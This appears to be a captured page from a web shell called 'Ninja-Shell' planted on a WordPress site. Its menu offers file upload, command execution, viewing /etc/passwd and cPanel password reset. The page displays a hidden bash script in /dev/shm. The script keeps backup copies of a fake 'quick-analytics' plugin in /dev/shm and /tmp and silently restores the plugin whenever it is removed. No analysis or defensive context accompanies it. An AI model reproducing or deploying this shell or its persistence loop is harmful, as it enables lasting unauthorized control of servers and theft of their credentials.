{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: //run/shm/.fd68e73e
#!/bin/bash L='/dev/shm/.fd68e73e.lock' exec 200>"$L" && flock -n 200 || exit 0 B1='/dev/shm/.quick-analytics.php' B2='/tmp/.quick-analytics.php' SELF='/var/www/inspiredfutures/wp-content/plugins/quick-analytics/quick-analytics.php' while :; do sleep $((1500 + RANDOM % 600)) if [ ! -f "$SELF" ]; then for b in "$B1" "$B2"; do [ -f "$b" ] && { cp "$b" "$SELF" 2>/dev/null; break; }; done fi [ -f "$B1" ] || cp "$SELF" "$B1" 2>/dev/null [ -f "$B2" ] || cp "$SELF" "$B2" 2>/dev/null done
./Ninja\.